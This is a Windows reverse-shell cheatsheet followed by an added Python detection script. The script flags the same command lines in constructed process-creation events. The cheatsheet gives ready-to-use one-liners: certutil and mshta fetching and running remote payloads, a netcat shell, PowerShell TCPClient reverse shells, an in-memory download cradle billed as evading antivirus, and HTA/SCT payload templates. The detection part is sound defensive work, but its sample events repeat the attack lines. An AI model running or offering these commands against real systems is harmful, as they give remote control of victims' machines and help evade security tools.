Windows Reverse Shells Cheatsheet
Certutil
certutil.exe -urlcache -split -f http://<placeholder_ip>:<placeholder_port>/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe
MSHTA
mshta.exe vbscript:Close(Execute("GetObject(""script:http://<placeholder_ip>:<placeholder_port>/payload.sct"")"))
mshta.exe http://<placeholder_ip>:<placeholder_port>/payload.hta
mshta.exe \\<placeholder_ip>\folder\payload.hta
HTA payloads
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
SCT payloads
<?XML version="1.0"?>
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>
</script>
</scriptlet>
Netcat
nc.exe -e cmd.exe <placeholder_ip> <placeholder_port>
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client=New-Object System.Net.Sockets.TCPClient("<placeholder_ip>",<placeholder_port>);$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2=$sb+"PS "+(pwd).Path+"> ";$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<placeholder_ip>',<placeholder_port>);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Download and execute a PowerShell payload directly in memory (this can be useful for evading antivirus):
powershell IEX (New-Object Net.WebClient).DownloadString('http://<placeholder_ip>:<placeholder_port>/shell.ps1')
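Detection note. Every entry on this cheatsheet runs through a signed Windows binary (certutil, mshta, nc, powershell) with a command line that is unusual for legitimate use, so process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 with command-line auditing) is where these patterns surface. The script below is an added example written for this page, not code from the cheatsheet's author: it encodes the command-line shapes listed above as regular expressions and runs them over a handful of constructed sample events. The event dictionary layout, the rule names, the host name and the IP 192.0.2.10 (documentation range) are all assumptions of this example.

```python
"""Flag process-creation command lines that match the LOLBin / reverse-shell
patterns from the cheatsheet above. Events and IPs are constructed samples."""
import re
from typing import Dict, List

# One rule per cheatsheet technique. Each regex follows the observed command
# shape; they are starting points for a hunt, not a complete signature set.
RULES = [
    # certutil used as a downloader: -urlcache with a remote source
    ("certutil_remote_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*(?:https?://|\\\\)", re.I)),
    # mshta pulling content over HTTP/SMB or via a script:/vbscript: moniker
    ("mshta_remote_content",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|\\\\|vbscript:|script:)", re.I)),
    # netcat spawning an interpreter with -e
    ("netcat_exec_shell",
     re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S*(?:cmd|powershell)", re.I)),
    # PowerShell opening a raw TCP socket (the TCPClient one-liners)
    ("powershell_tcpclient",
     re.compile(r"\bpowershell\b.*Net\.Sockets\.TCPClient", re.I)),
    # download cradle: IEX / Invoke-Expression fed by DownloadString
    ("powershell_download_cradle",
     re.compile(r"\bpowershell\b.*(?:IEX|Invoke-Expression).*DownloadString", re.I)),
    # hidden window plus execution-policy bypass, in either order
    ("powershell_hidden_bypass",
     re.compile(r"\bpowershell\b(?=.*-W(?:indowStyle)?\s+Hidden)"
                r"(?=.*-Exec(?:utionPolicy)?\s+Bypass)", re.I)),
]


def classify(command_line: str) -> List[str]:
    """Return the names of every rule the command line matches (empty = no hit)."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over process-creation events; keep only the ones that hit."""
    alerts = []
    for ev in events:
        hits = classify(ev["CommandLine"])
        if hits:
            alerts.append({"host": ev["Host"], "image": ev["Image"], "rules": hits})
    return alerts


# Constructed sample events (assumed layout, not real telemetry). The first five
# mirror the cheatsheet entries; the last three are benign look-alikes.
SAMPLE_EVENTS = [
    {"Host": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.0.2.10:8080/beacon.exe "
                    r"C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe"},
    {"Host": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Close(Execute("GetObject(""script:http://192.0.2.10:8080/payload.sct"")"))'},
    {"Host": "WS02", "Image": r"C:\Users\Public\nc.exe",
     "CommandLine": "nc.exe -e cmd.exe 192.0.2.10 4444"},
    {"Host": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
                    "$client=New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444);$s=$client.GetStream()"},
    {"Host": "WS03", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/shell.ps1')"},
    {"Host": "WS03", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\Temp\setup.msi SHA256"},
    {"Host": "WS04", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"Host": "WS04", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"{alert['host']:<5} {alert['image']}  ->  {', '.join(alert['rules'])}")
```

Note that the mshta rule deliberately does not fire on a local .hta path: the cheatsheet's mshta entries all fetch content remotely (HTTP, a UNC share, or a script: moniker), and that remote fetch is the discriminating feature, so a local HTA launch would need its own rule or a parent-process check. The hidden-window rule uses two lookaheads so the switches can appear in either order.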